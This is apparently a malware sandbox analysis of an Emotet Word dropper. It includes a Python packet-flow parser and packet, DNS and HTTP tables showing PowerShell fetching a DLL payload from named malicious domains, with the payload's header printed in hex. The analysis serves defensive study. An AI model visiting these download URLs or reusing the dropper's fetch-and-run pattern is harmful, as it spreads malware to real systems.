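Jan 25, 2021 18:41:37.047234058 CET 49167 80 192.168.2.22 23.227.169.146
Jan 25, 2021 18:41:37.219583035 CET 80 49167 23.227.169.146 192.168.2.22
Jan 25, 2021 18:41:37.270761013 CET 80 49167 23.227.169.146 192.168.2.22
Jan 25, 2021 18:41:37.270806074 CET 80 49167 23.227.169.146 192.168.2.22
Jan 25, 2021 18:41:37.270848036 CET 80 49167 23.227.169.146 192.168.2.22
"""


def parse_row(line):
    stamp, _, rest = line.partition(" CET ")
    base, frac = stamp.rsplit(".", 1)                 # datetime takes microseconds only
    ts = datetime.strptime(f"{base}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")
    sport, dport, src, dst = rest.split()
    return ts, int(sport), int(dport), src, dst


def build_flows(table, host=SANDBOX_HOST):
    """Group packets by remote ip:port; rows are assumed to be in time order."""
    flows = {}
    for line in table.splitlines():
        if not line.strip():
            continue
        ts, sport, dport, src, dst = parse_row(line)
        if src == host:
            peer, direction, cport = f"{dst}:{dport}", "out", sport
        elif dst == host:
            peer, direction, cport = f"{src}:{sport}", "in", dport
        else:
            continue
        f = flows.setdefault(peer, {"out": [], "in": [], "client_ports": set()})
        f[direction].append(ts)
        f["client_ports"].add(cport)
    return flows


def summarize(table, host=SANDBOX_HOST):
    out = {}
    for peer, f in build_flows(table, host).items():
        stamps = f["out"] + f["in"]
        # With no flags in the table, "answered" only means the peer sent something back.
        # For a peer that never answered, the spacing of the client's packets is what
        # identifies retransmission of an unanswered connection attempt.
        gaps = [round((b - a).total_seconds()) for a, b in zip(f["out"], f["out"][1:])]
        out[peer] = {
            "client_ports": sorted(f["client_ports"]),
            "out": len(f["out"]),
            "in": len(f["in"]),
            "status": "answered" if f["in"] else "unanswered",
            "duration_s": round((max(stamps) - min(stamps)).total_seconds(), 3),
            "retransmit_gaps_s": [] if f["in"] else gaps,
        }
    return out


if __name__ == "__main__":
    for peer, info in summarize(PACKET_TABLE).items():
        print(peer, info)
```

Run on the rows, 162.241.253.129 and 23.227.169.146 both answer (a short request/response exchange each), while 124.156.135.253 receives three client packets spaced 3 s and then 6 s apart and never replies. That doubling back-off is the spacing Windows uses when it retransmits an unanswered SYN, so the second server in the dropper's list was dead or filtered at analysis time, which is a common sight with Emotet's multi-URL downloaders and is why all contacted hosts, not only the one that served a payload, belong in the indicator list.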

                                        Network Port Distribution

                                        TCP Packets

                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                        Jan 25, 2021 18:41:13.270375967 CET | 49165 | 80 | 192.168.2.22 | 162.241.253.129
                                        Jan 25, 2021 18:41:13.439429998 CET | 80 | 49165 | 162.241.253.129 | 192.168.2.22
                                        Jan 25, 2021 18:41:13.439626932 CET | 49165 | 80 | 192.168.2.22 | 162.241.253.129
                                        Jan 25, 2021 18:41:13.442131996 CET | 49165 | 80 | 192.168.2.22 | 162.241.253.129
                                        Jan 25, 2021 18:41:13.612253904 CET | 80 | 49165 | 162.241.253.129 | 192.168.2.22
                                        Jan 25, 2021 18:41:13.626480103 CET | 80 | 49165 | 162.241.253.129 | 192.168.2.22
                                        Jan 25, 2021 18:41:13.644927979 CET | 49165 | 80 | 192.168.2.22 | 162.241.253.129
                                        Jan 25, 2021 18:41:13.854820967 CET | 80 | 49165 | 162.241.253.129 | 192.168.2.22
                                        Jan 25, 2021 18:41:13.890619040 CET | 80 | 49165 | 162.241.253.129 | 192.168.2.22
                                        Jan 25, 2021 18:41:13.890644073 CET | 80 | 49165 | 162.241.253.129 | 192.168.2.22
                                        Jan 25, 2021 18:41:13.890659094 CET | 80 | 49165 | 162.241.253.129 | 192.168.2.22
                                        Jan 25, 2021 18:41:13.890676022 CET | 80 | 49165 | 162.241.253.129 | 192.168.2.22
                                        Jan 25, 2021 18:41:13.890692949 CET | 80 | 49165 | 162.241.253.129 | 192.168.2.22
                                        Jan 25, 2021 18:41:13.890708923 CET | 80 | 49165 | 162.241.253.129 | 192.168.2.22
                                        Jan 25, 2021 18:41:13.890867949 CET | 49165 | 80 | 192.168.2.22 | 162.241.253.129
                                        Jan 25, 2021 18:41:13.999680042 CET | 80 | 49165 | 162.241.253.129 | 192.168.2.22
                                        Jan 25, 2021 18:41:14.202847004 CET | 49165 | 80 | 192.168.2.22 | 162.241.253.129
                                        Jan 25, 2021 18:41:15.644818068 CET | 49166 | 80 | 192.168.2.22 | 124.156.135.253
                                        Jan 25, 2021 18:41:18.649360895 CET | 49166 | 80 | 192.168.2.22 | 124.156.135.253
                                        Jan 25, 2021 18:41:18.893965960 CET | 80 | 49165 | 162.241.253.129 | 192.168.2.22
                                        Jan 25, 2021 18:41:18.894093037 CET | 49165 | 80 | 192.168.2.22 | 162.241.253.129
                                        Jan 25, 2021 18:41:24.655850887 CET | 49166 | 80 | 192.168.2.22 | 124.156.135.253
                                        Jan 25, 2021 18:41:36.874211073 CET | 49167 | 80 | 192.168.2.22 | 23.227.169.146
                                        Jan 25, 2021 18:41:37.046713114 CET | 80 | 49167 | 23.227.169.146 | 192.168.2.22
                                        Jan 25, 2021 18:41:37.046950102 CET | 49167 | 80 | 192.168.2.22 | 23.227.169.146
                                        Jan 25, 2021 18:41:37.047234058 CET | 49167 | 80 | 192.168.2.22 | 23.227.169.146
                                        Jan 25, 2021 18:41:37.219583035 CET | 80 | 49167 | 23.227.169.146 | 192.168.2.22
                                        Jan 25, 2021 18:41:37.270761013 CET | 80 | 49167 | 23.227.169.146 | 192.168.2.22
                                        Jan 25, 2021 18:41:37.270806074 CET | 80 | 49167 | 23.227.169.146 | 192.168.2.22
                                        Jan 25, 2021 18:41:37.270848036 CET | 80 | 49167 | 23.227.169.146 | 192.168.2.22
                                        Jan 25, 2021 18:41:37.270880938 CET | 80 | 49167 | 23.227.169.146 | 192.168.2.22
                                        Jan 25, 2021 18:41:37.270903111 CET | 80 | 49167 | 23.227.169.146 | 192.168.2.22
                                        Jan 25, 2021 18:41:37.270925045 CET | 80 | 49167 | 23.227.169.146 | 192.168.2.22
                                        Jan 25, 2021 18:41:37.270942926 CET | 49167 | 80 | 192.168.2.22 | 23.227.169.146
                                        Jan 25, 2021 18:41:37.270945072 CET | 80 | 49167 | 23.227.169.146 | 192.168.2.22
                                        Jan 25, 2021 18:41:37.270966053 CET | 80 | 49167 | 23.227.169.146 | 192.168.2.22
                                        Jan 25, 2021 18:41:37.270987034 CET | 80 | 49167 | 23.227.169.146 | 192.168.2.22
                                        Jan 25, 2021 18:41:37.270999908 CET | 49167 | 80 | 192.168.2.22 | 23.227.169.146
                                        Jan 25, 2021 18:41:37.271013975 CET | 80 | 49167 | 23.227.169.146 | 192.168.2.22
                                        Jan 25, 2021 18:41:37.271023989 CET | 49167 | 80 | 192.168.2.22 | 23.227.169.146
                                        Jan 25, 2021 18:41:37.271064997 CET | 49167 | 80 | 192.168.2.22 | 23.227.169.146
                                        Jan 25, 2021 18:41:37.443494081 CET | 80 | 49167 | 23.227.169.146 | 192.168.2.22
                                        Jan 25, 2021 18:41:37.443528891 CET | 80 | 49167 | 23.227.169.146 | 192.168.2.22
                                        Jan 25, 2021 18:41:37.443553925 CET | 80 | 49167 | 23.227.169.146 | 192.168.2.22
                                        Jan 25, 2021 18:41:37.443577051 CET | 80 | 49167 | 23.227.169.146 | 192.168.2.22
                                        Jan 25, 2021 18:41:37.443598986 CET | 80 | 49167 | 23.227.169.146 | 192.168.2.22
                                        Jan 25, 2021 18:41:37.443613052 CET | 49167 | 80 | 192.168.2.22 | 23.227.169.146
                                        Jan 25, 2021 18:41:37.443639040 CET | 80 | 49167 | 23.227.169.146 | 192.168.2.22
                                        Jan 25, 2021 18:41:37.443650961 CET | 49167 | 80 | 192.168.2.22 | 23.227.169.146
                                        Jan 25, 2021 18:41:37.443672895 CET | 80 | 49167 | 23.227.169.146 | 192.168.2.22
                                        Jan 25, 2021 18:41:37.443681955 CET | 49167 | 80 | 192.168.2.22 | 23.227.169.146
                                        Jan 25, 2021 18:41:37.443705082 CET | 80 | 49167 | 23.227.169.146 | 192.168.2.22
                                        Jan 25, 2021 18:41:37.443727970 CET | 80 | 49167 | 23.227.169.146 | 192.168.2.22
                                        Jan 25, 2021 18:41:37.443763971 CET | 49167 | 80 | 192.168.2.22 | 23.227.169.146
                                        Jan 25, 2021 18:41:37.443779945 CET | 80 | 49167 | 23.227.169.146 | 192.168.2.22
                                        Jan 25, 2021 18:41:37.443797112 CET | 80 | 49167 | 23.227.169.146 | 192.168.2.22
                                        Jan 25, 2021 18:41:37.443813086 CET | 80 | 49167 | 23.227.169.146 | 192.168.2.22
                                        Jan 25, 2021 18:41:37.443829060 CET | 80 | 49167 | 23.227.169.146 | 192.168.2.22
                                        Jan 25, 2021 18:41:37.443836927 CET | 49167 | 80 | 192.168.2.22 | 23.227.169.146
                                        Jan 25, 2021 18:41:37.443851948 CET | 80 | 49167 | 23.227.169.146 | 192.168.2.22
                                        Jan 25, 2021 18:41:37.443860054 CET | 49167 | 80 | 192.168.2.22 | 23.227.169.146
                                        Jan 25, 2021 18:41:37.443875074 CET | 80 | 49167 | 23.227.169.146 | 192.168.2.22
                                        Jan 25, 2021 18:41:37.443890095 CET | 80 | 49167 | 23.227.169.146 | 192.168.2.22
                                        Jan 25, 2021 18:41:37.443898916 CET | 49167 | 80 | 192.168.2.22 | 23.227.169.146
                                        Jan 25, 2021 18:41:37.443917036 CET | 80 | 49167 | 23.227.169.146 | 192.168.2.22
                                        Jan 25, 2021 18:41:37.443933964 CET | 80 | 49167 | 23.227.169.146 | 192.168.2.22
                                        Jan 25, 2021 18:41:37.443943024 CET | 49167 | 80 | 192.168.2.22 | 23.227.169.146
                                        Jan 25, 2021 18:41:37.443958998 CET | 80 | 49167 | 23.227.169.146 | 192.168.2.22
                                        Jan 25, 2021 18:41:37.443974018 CET | 49167 | 80 | 192.168.2.22 | 23.227.169.146
                                        Jan 25, 2021 18:41:37.443985939 CET | 80 | 49167 | 23.227.169.146 | 192.168.2.22
                                        Jan 25, 2021 18:41:37.444046974 CET | 49167 | 80 | 192.168.2.22 | 23.227.169.146
                                        Jan 25, 2021 18:41:37.444250107 CET | 49167 | 80 | 192.168.2.22 | 23.227.169.146
                                        Jan 25, 2021 18:41:37.616776943 CET | 80 | 49167 | 23.227.169.146 | 192.168.2.22
                                        Jan 25, 2021 18:41:37.616841078 CET | 80 | 49167 | 23.227.169.146 | 192.168.2.22
                                        Jan 25, 2021 18:41:37.616868019 CET | 80 | 49167 | 23.227.169.146 | 192.168.2.22
                                        Jan 25, 2021 18:41:37.616893053 CET | 80 | 49167 | 23.227.169.146 | 192.168.2.22
                                        Jan 25, 2021 18:41:37.616920948 CET | 80 | 49167 | 23.227.169.146 | 192.168.2.22
                                        Jan 25, 2021 18:41:37.616945982 CET | 80 | 49167 | 23.227.169.146 | 192.168.2.22
                                        Jan 25, 2021 18:41:37.616972923 CET | 80 | 49167 | 23.227.169.146 | 192.168.2.22
                                        Jan 25, 2021 18:41:37.616991997 CET | 49167 | 80 | 192.168.2.22 | 23.227.169.146
                                        Jan 25, 2021 18:41:37.617007971 CET | 49167 | 80 | 192.168.2.22 | 23.227.169.146
                                        Jan 25, 2021 18:41:37.617031097 CET | 80 | 49167 | 23.227.169.146 | 192.168.2.22
                                        Jan 25, 2021 18:41:37.617057085 CET | 80 | 49167 | 23.227.169.146 | 192.168.2.22
                                        Jan 25, 2021 18:41:37.617082119 CET | 80 | 49167 | 23.227.169.146 | 192.168.2.22
                                        Jan 25, 2021 18:41:37.617091894 CET | 49167 | 80 | 192.168.2.22 | 23.227.169.146
                                        Jan 25, 2021 18:41:37.617119074 CET | 80 | 49167 | 23.227.169.146 | 192.168.2.22
                                        Jan 25, 2021 18:41:37.617130995 CET | 49167 | 80 | 192.168.2.22 | 23.227.169.146
                                        Jan 25, 2021 18:41:37.617156029 CET | 80 | 49167 | 23.227.169.146 | 192.168.2.22
                                        Jan 25, 2021 18:41:37.617182970 CET | 80 | 49167 | 23.227.169.146 | 192.168.2.22
                                        Jan 25, 2021 18:41:37.617194891 CET | 49167 | 80 | 192.168.2.22 | 23.227.169.146
                                        Jan 25, 2021 18:41:37.617223978 CET | 80 | 49167 | 23.227.169.146 | 192.168.2.22
                                        Jan 25, 2021 18:41:37.617248058 CET | 49167 | 80 | 192.168.2.22 | 23.227.169.146
                                        Jan 25, 2021 18:41:37.617261887 CET | 80 | 49167 | 23.227.169.146 | 192.168.2.22
                                        Jan 25, 2021 18:41:37.617292881 CET | 80 | 49167 | 23.227.169.146 | 192.168.2.22
                                        Jan 25, 2021 18:41:37.617302895 CET | 49167 | 80 | 192.168.2.22 | 23.227.169.146
                                        Jan 25, 2021 18:41:37.617326021 CET | 80 | 49167 | 23.227.169.146 | 192.168.2.22
                                        Jan 25, 2021 18:41:37.617369890 CET | 80 | 49167 | 23.227.169.146 | 192.168.2.22
                                        Jan 25, 2021 18:41:37.617419958 CET | 80 | 49167 | 23.227.169.146 | 192.168.2.22
                                        Jan 25, 2021 18:41:37.617429018 CET | 49167 | 80 | 192.168.2.22 | 23.227.169.146
                                        Jan 25, 2021 18:41:37.617453098 CET | 80 | 49167 | 23.227.169.146 | 192.168.2.22

                                        UDP Packets

                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                        Jan 25, 2021 18:41:13.113156080 CET | 52197 | 53 | 192.168.2.22 | 8.8.8.8
                                        Jan 25, 2021 18:41:13.256899118 CET | 53 | 52197 | 8.8.8.8 | 192.168.2.22
                                        Jan 25, 2021 18:41:14.014039040 CET | 53099 | 53 | 192.168.2.22 | 8.8.8.8
                                        Jan 25, 2021 18:41:15.014322996 CET | 53099 | 53 | 192.168.2.22 | 8.8.8.8
                                        Jan 25, 2021 18:41:15.644002914 CET | 53 | 53099 | 8.8.8.8 | 192.168.2.22
                                        Jan 25, 2021 18:41:15.656841040 CET | 53 | 53099 | 8.8.8.8 | 192.168.2.22
                                        Jan 25, 2021 18:41:36.699511051 CET | 52838 | 53 | 192.168.2.22 | 8.8.8.8
                                        Jan 25, 2021 18:41:36.873501062 CET | 53 | 52838 | 8.8.8.8 | 192.168.2.22

                                        ICMP Packets

                                        Timestamp | Source IP | Dest IP | Checksum | Code | Type
                                        Jan 25, 2021 18:41:15.656946898 CET | 192.168.2.22 | 8.8.8.8 | d015 | (Port unreachable) | Destination Unreachable

                                        DNS Queries

                                        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                        Jan 25, 2021 18:41:13.113156080 CET | 192.168.2.22 | 8.8.8.8 | 0x8c10 | Standard query (0) | uagritech.com | A (IP address) | IN (0x0001)
                                        Jan 25, 2021 18:41:14.014039040 CET | 192.168.2.22 | 8.8.8.8 | 0x644c | Standard query (0) | www.91yudao.com | A (IP address) | IN (0x0001)
                                        Jan 25, 2021 18:41:15.014322996 CET | 192.168.2.22 | 8.8.8.8 | 0x644c | Standard query (0) | www.91yudao.com | A (IP address) | IN (0x0001)
                                        Jan 25, 2021 18:41:36.699511051 CET | 192.168.2.22 | 8.8.8.8 | 0xd372 | Standard query (0) | yourcleanersurfaces.com | A (IP address) | IN (0x0001)

                                        DNS Answers

                                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                        Jan 25, 2021 18:41:13.256899118 CET | 8.8.8.8 | 192.168.2.22 | 0x8c10 | No error (0) | uagritech.com | - | 162.241.253.129 | A (IP address) | IN (0x0001)
                                        Jan 25, 2021 18:41:15.644002914 CET | 8.8.8.8 | 192.168.2.22 | 0x644c | No error (0) | www.91yudao.com | - | 124.156.135.253 | A (IP address) | IN (0x0001)
                                        Jan 25, 2021 18:41:15.656841040 CET | 8.8.8.8 | 192.168.2.22 | 0x644c | No error (0) | www.91yudao.com | - | 124.156.135.253 | A (IP address) | IN (0x0001)
                                        Jan 25, 2021 18:41:36.873501062 CET | 8.8.8.8 | 192.168.2.22 | 0xd372 | No error (0) | yourcleanersurfaces.com | - | 23.227.169.146 | A (IP address) | IN (0x0001)

                                        HTTP Request Dependency Graph

                                        • uagritech.com
                                        • yourcleanersurfaces.com

                                        HTTP Packets

                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                        0 | 192.168.2.22 | 49165 | 162.241.253.129 | 80 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        Jan 25, 2021 18:41:13.442131996 CET | 0 | OUT | GET /cgi-bin/a5G/ HTTP/1.1
                                        Host: uagritech.com
                                        Connection: Keep-Alive
                                        Jan 25, 2021 18:41:13.626480103 CET | 1 | IN | HTTP/1.1 302 Found
                                        Date: Mon, 25 Jan 2021 17:41:13 GMT
                                        Server: Apache
                                        Location: http://uagritech.com/cgi-sys/suspendedpage.cgi
                                        Content-Length: 230
                                        Keep-Alive: timeout=5, max=75
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=iso-8859-1
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 75 61 67 72 69 74 65 63 68 2e 63 6f 6d 2f 63 67 69 2d 73 79 73 2f 73 75 73 70 65 6e 64 65 64 70 61 67 65 2e 63 67 69 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://uagritech.com/cgi-sys/suspendedpage.cgi">here</a>.</p></body></html>
                                        Jan 25, 2021 18:41:13.644927979 CET | 1 | OUT | GET /cgi-sys/suspendedpage.cgi HTTP/1.1
                                        Host: uagritech.com
                                        Jan 25, 2021 18:41:13.890619040 CET | 2 | IN | HTTP/1.1 200 OK
                                        Date: Mon, 25 Jan 2021 17:41:13 GMT
                                        Server: Apache
                                        Vary: Accept-Encoding
                                        host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                        Transfer-Encoding: chunked
                                        Content-Type: text/html
                                        Data Raw: 31 64 63 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 6f 75 6e 74 20 53 75 73 70 65 6e 64 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 2f 75 73 65 2e 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 63 6f 6d 2f 72 65 6c 65 61 73 65 73 2f 76 35 2e 30 2e 36 2f 63 73 73 2f 61 6c 6c 2e 63 73 73 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 
34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a
                                        Data Ascii: 1dc4<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1"> <title>Account Suspended</title> <link rel="stylesheet" href="//use.fontawesome.com/releases/v5.0.6/css/all.css"> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .additional-info { background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF;


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                        1 | 192.168.2.22 | 49167 | 23.227.169.146 | 80 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        Jan 25, 2021 18:41:37.047234058 CET | 10 | OUT | GET /four-monks-acasz/O2my/ HTTP/1.1
                                        Host: yourcleanersurfaces.com
                                        Connection: Keep-Alive
                                        Jan 25, 2021 18:41:37.270761013 CET | 12 | IN | HTTP/1.1 200 OK
                                        Date: Mon, 25 Jan 2021 17:41:37 GMT
                                        Server: Apache
                                        Cache-Control: no-cache, must-revalidate
                                        Pragma: no-cache
                                        Expires: Mon, 25 Jan 2021 17:41:37 GMT
                                        Content-Disposition: attachment; filename="N8PGIlXzvsz3f.dll"
                                        Content-Transfer-Encoding: binary
                                        Set-Cookie: 600f02d12f27f=1611596497; expires=Mon, 25-Jan-2021 17:42:37 GMT; Max-Age=60; path=/
                                        Last-Modified: Mon, 25 Jan 2021 17:41:37 GMT
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Transfer-Encoding: chunked
                                        Content-Type: application/octet-stream
                                        Data Raw: 33 64 30 31 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 ae 84 0a 60 00 00 00 00 00 00 00 00 e0 00 0e 21 0b 01 02 32 00 40 00 00 00 12 05 00 00 00 00 00 30 16 00 00 00 10 00 00 00 50 00 00 00 00 00 10 00 10 00 00 00 02 00 00 03 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 d0 05 00 00 04 00 00 de dd 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e8 60 00 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 05 00 58 15 00 00 00 c0 05 00 e4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 61 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a5 36 00 00 00 10 00 00 00 38 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 24 00 00 00 00 50 00 00 00 02 00 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 90 04 00 00 00 60 00 00 00 04 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 65 78 74 34 00 00 9c 05 05 00 00 70 00 00 00 06 05 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 65 78 74 38 00 00 64 00 00 00 00 80 05 00 00 02 00 00 00 48 05 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 40 2e 74 65 78 74 37 00 00 64 00 00 00 00 90 05 00 00 02 00 00 00 4a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 40 2e 74 65 78 74 36 00 00 64 00 00 00 00 a0 05 00 00 02 00 00 00 4c 05 00 00 00 00 00 
00 00 00 00 00 00 00 00 20 00 00 40 2e 74 65 78 74 35 00 00 64 00 00 00 00 b0 05 00 00 02 00 00 00 4e 05 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 40 2e 72 65 6c 6f 63 00 00 e4 03 00 00 00 c0 05 00 00 04 00 00 00 50 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                        Data Ascii: 3d01MZ@!L!This program cannot be run in DOS mode.$PEL`!2@0P`dTXa`.text68 `.rdata$P<@@.data`>@.text4pB@.text8dH @.text7dJ @.text6dL @.text5dN @.relocP@B


                                        Code Manipulations

                                        Statistics

                                        Behavior

                                        System Behavior

                                        General

                                        Start time: 18:40:41
                                        Start date: 25/01/2021
                                        Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        Wow64 process (32bit): false
                                        Commandline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
